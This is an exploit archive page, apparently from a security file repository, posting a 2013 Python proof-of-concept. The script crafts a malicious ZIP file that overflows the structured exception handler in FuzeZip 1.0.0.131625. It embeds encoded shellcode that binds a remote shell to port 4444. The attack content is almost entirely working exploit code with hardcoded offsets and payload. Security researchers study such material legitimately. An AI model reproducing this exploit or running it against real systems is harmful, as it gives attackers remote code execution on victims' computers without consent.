FuzeZip 1.0.0.131625 Buffer Overflow

FuzeZip 1.0.0.131625 Buffer Overflow: Posted May 3, 2013; Authored by Pedro Guillen Nunez, Miguel Angel de Castro Simon, Josep Pi Rodriguez; FuzeZip version 1.0.0.131625 structured exception handler buffer overflow exploit that binds a shell to port 4444.; tags | exploit, overflow, shell; SHA-256 | 16af598a8a9110ba118802425d3aee66e98d1676f712385eb4834b602a3e7d53; Download | Favorite | View

FuzeZip 1.0.0.131625 Buffer Overflow

#!/usr/bin/python
# Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0
# Date: 16.Apr.2013 Vulnerability reported
# Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon
# Organization: RealPentesting 
# Vendor Homepage: http://fuzezip.com/
# Software Link: http://download.fuzezip.com/FuzeZipSetup.exe
# Version: 1.0.0.131625
# Tested on: Windows 2003 Server Standard SP2

header1 = (
"\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E"
"\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00"
)

#0x003F 335C

seh = "\x9a\x9f"
nextsh = "\x58\x70"

header_m = "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x74\x65\x73\x74\x21\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00\x00\x00\x00\x00\x01\x00\x20\x08\x00\x00\x00\x00\x00\x00"
header_f = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\xED\x17\x00\x00\xEC\x17\x00\x00\x00\x00"

venetian = (
"\x55\x55"
"\x72"
"\x58"
"\x72"
"\x05\x25\x11"
"\x72"
"\x2d\x11\x11"
)

shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
"AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
"BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
"TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
"3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
"QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
"K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
"2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
"60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
"KKK045M5WKQ7N3RRRORJM0QCKOHUA"
)

print len(shellcode)

payload = "\x90" * 818 + nextsh + seh + venetian + "\x90" * 109 + "\x72" + shellcode + "\x43" * 4323

buff = payload  
print len(payload)
mefile = open('josep.zip','w')
mefile.write(header1 + buff + header_m + buff + header_f)
mefile.close()

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 138 files
Ubuntu 73 files
Gentoo 33 files
Debian 28 files
Sebastian Hamann 8 files
Jann Horn 7 files
Moritz Abrell 6 files
Jaggar Henry 6 files
Google Security Research 6 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,945)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,659)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,783)
UNIX (9,443)
UnixWare (187)
Windows (6,679)
Other

FuzeZip 1.0.0.131625 Buffer Overflow

FuzeZip 1.0.0.131625 Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FuzeZip 1.0.0.131625 Buffer Overflow

Share This

FuzeZip 1.0.0.131625 Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems